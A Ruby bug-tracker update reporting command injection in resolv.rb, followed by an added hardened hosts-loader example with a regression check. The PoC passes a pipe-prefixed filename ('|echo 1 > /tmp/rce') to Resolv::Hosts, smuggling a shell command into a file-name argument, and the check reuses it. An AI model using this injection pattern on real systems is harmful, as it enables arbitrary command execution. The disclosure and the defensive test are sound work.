From: jazzy171120@...
Date: 2017-12-19T10:08:43+00:00
Subject: [ruby-core:84348] [Ruby trunk Bug#14205] Unsanitizied filename leads to command injection in 'resolv.rb'

Issue #14205 has been updated by drigg3r (Jasraj Bedi).

Subject changed from Unsanitizied filename leads to command injection in 'resolv' to Unsanitizied filename leads to command injection in 'resolv.rb'

PoC Concept Code

~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~

----------------------------------------
Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
https://bugs.ruby-lang.org/issues/14205#change-68524

* Author: drigg3r (Jasraj Bedi)
* Status: Open
* Priority: Normal
* Assignee:
* Target version:
* ruby -v:
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN
----------------------------------------
Here is the pull request https://github.com/ruby/ruby/pull/1777

--
https://bugs.ruby-lang.org/
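
The hardened pattern for the flaw reported above, as an added example that is not part of the original message, not resolv.rb's code and not the linked pull request's patch. It assumes the injection comes from handing the filename to `Kernel#open`, which on affected Ruby versions treats a leading `|` as a command to spawn; `load_hosts` and `pipe_name_is_inert?` are hypothetical names, and the hosts data is constructed.

```ruby
require 'tmpdir'

# Hypothetical loader, not resolv.rb's code: reads a hosts-format file into
# a { name => [addresses] } map. File.open always treats its argument as a
# path, so a name such as "|cmd" is just a (missing) file.
def load_hosts(filename)
  name2addr = Hash.new { |h, k| h[k] = [] }
  File.open(filename, 'rb') do |f|
    f.each_line do |line|
      addr, *names = line.sub(/#.*/, '').split # drop comments, split on whitespace
      next if addr.nil?
      names.each { |n| name2addr[n.downcase] << addr }
    end
  end
  name2addr
end

# Hypothetical check: feed the loader a pipe-style name like the one in the
# report and confirm the redirect target was never created.
def pipe_name_is_inert?(dir)
  marker = File.join(dir, 'marker')
  begin
    load_hosts("|echo 1 > #{marker}")
  rescue SystemCallError
    # Expected: Errno::ENOENT, because no file has that literal name.
  end
  !File.exist?(marker)
end

if $PROGRAM_NAME == __FILE__
  Dir.mktmpdir do |dir|
    hosts = File.join(dir, 'hosts')
    # Constructed sample input.
    File.write(hosts, "127.0.0.1 localhost # loopback\n10.0.0.5 Test test.example\n")
    p load_hosts(hosts)
    puts "pipe-style name inert: #{pipe_name_is_inert?(dir)}"
  end
end
```

The same check works as a regression test for any code path that opens a caller-supplied filename.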